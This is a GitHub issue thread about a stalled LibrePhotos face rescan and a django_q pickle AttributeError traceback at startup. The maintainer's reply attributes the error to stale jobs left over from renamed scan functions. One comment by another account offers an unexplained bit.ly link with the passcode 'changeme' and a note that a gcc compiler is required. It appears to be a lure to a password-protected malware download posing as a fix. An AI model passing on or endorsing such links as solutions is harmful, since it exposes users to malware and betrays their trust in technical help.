### ISSUE TITLE
full face rescan stalled, errors on startup

### ISSUE THREAD

**Issue by ChrisFab16** [LibrePhotos/librephotos#1395]
on latest docker image per today.
I had tried running a full face rescan - it stalled at 58 percent with no progress.
at 29 days i stopped  the container and updated to current release.

on startup my log is full of this:

            ^^^^^^^^^^^^^^^^^^
backend_1   | AttributeError: Can't get attribute 'face_scan_job' on <module 'api.directory_watcher' from '/code/api/directory_watcher.py'>
backend_1   | 13:18:11 [Q] CRITICAL reincarnated pusher Process-89b021ae244843eca3571db4043bbcf8 after sudden death
backend_1   | 13:18:11 [Q] INFO Process-87c1d60875e44102916fb12320046d96 pushing tasks at 1015
backend_1   | Process Process-87c1d60875e44102916fb12320046d96:
backend_1   | Traceback (most recent call last):
backend_1   |   File "/usr/lib/python3.12/multiprocessing/process.py", line 314, in _bootstrap
backend_1   |     self.run()
backend_1   |   File "/usr/lib/python3.12/multiprocessing/process.py", line 108, in run
backend_1   |     self._target(*self._args, **self._kwargs)
backend_1   |   File "/usr/local/lib/python3.12/dist-packages/django_q/pusher.py", line 56, in pusher
backend_1   |     task = SignedPackage.loads(task[1])
backend_1   |            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
backend_1   |   File "/usr/local/lib/python3.12/dist-packages/django_q/signing.py", line 25, in loads
backend_1   |     return signing.loads(
backend_1   |            ^^^^^^^^^^^^^^
backend_1   |   File "/usr/local/lib/python3.12/dist-packages/django_q/core_signing.py", line 54, in loads
backend_1   |     return serializer().loads(data)
backend_1   |            ^^^^^^^^^^^^^^^^^^^^^^^^
backend_1   |   File "/usr/local/lib/python3.12/dist-packages/django_q/signing.py", line 39, in loads
backend_1   |     return pickle.loads(data)
backend_1   |            ^^^^^^^^^^^^^^^^^^
backend_1   | AttributeError: Can't get attribute 'face_scan_job' on <module 'api.directory_watcher' from '/code/api/directory_watcher.py'>

<img width="851" alt="htop screenshot" src="https://github.com/user-attachments/assets/9194fbb9-5565-4432-bfe4-e608de554282">

**Comment by fayaznasrati** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by derneuere** [comment]
It is not clear from which image you switched. I tried to reproduce it, but it works fine on both of my setups.

Two months ago I refactored how scanning works https://www.reddit.com/r/librephotos/comments/1e1dmd7/librephotos_development_2024_june/
It looks to me like your image was out of date, then your jobs stalled, you upgraded and then the old jobs started up again. This however results in an error, because I renamed the functions on how face scanning works.

This should not happen if you run another face scan.
